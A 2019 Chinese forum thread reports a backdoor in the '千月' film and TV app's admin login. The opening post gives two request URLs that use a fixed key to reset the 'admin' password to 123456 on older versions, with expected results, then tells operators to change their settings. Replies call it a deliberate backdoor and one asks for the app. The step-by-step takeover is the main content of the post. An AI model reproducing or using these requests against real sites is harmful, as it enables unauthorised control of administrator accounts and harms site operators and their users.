千月，影视双端漏洞，在运营的注意了！！

nisngyo · 发表于 2019-6-22 09:38:02

发个帖子水一波经验
千月，影视双端漏洞，在运营的注意了！！
前几天已经爆出漏洞利用代码拿后台！！！

接下来看好了！！
XXXX/login/login/yzcode?username=admin&key=465454&password=123456
复制以上代码
如果出现下面的结果，则表示可以更改

360截图-2347003.jpg (3.56 KB, 下载次数: 1)
接下来
XXXX/login/login/repass?username=admin&key=465454&password=123456
显示

360截图-888675.jpg (5.37 KB, 下载次数: 0)
出现以上结果，则表示，
账户 admin
密码已被更改为123456
拿下
目前爆出来的漏洞适用于旧版本，账户名为admin的
………………
所以，在运营的如果用户名为admin！！！请马上更改！！！个别有动手能力的改了安全码的那就不用了

高板惠乃果 · 发表于 2019-6-22 09:40:53

这是什么辣鸡程序，连登录都有漏洞

fengshu · 发表于 2019-6-22 09:41:57

大佬厉害了

差点就信了 · 发表于 2019-6-22 09:45:36

提示: 作者被禁止或删除内容自动屏蔽

reidme · 发表于 2019-6-22 09:46:52

握草，到处都是后门

geo · 发表于 2019-6-22 10:11:51

垃圾程序，结构不严谨

Apian · 发表于 2019-6-22 10:13:16

都忘记了，你不说我还不记得安装过这个，尼玛APP还在虚拟机呢，域名都忘记了。。。。

忘江湖 · 发表于 2019-6-22 10:25:42

有个key，说明是故意留下的后门了。。。并不是程序不严谨

钱多多 · 发表于 2019-6-22 10:34:27

後門

lzyroot · 发表于 2019-6-22 10:53:46

app发一下

		自动登录	找回密码
密码			注册

差点就信了差点就信了当前离线积分 102	发表于 2019-6-22 09:45:36 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
差点就信了差点就信了当前离线积分 102
	回复支持反对举报

[疑问] 千月，影视双端漏洞，在运营的注意了！！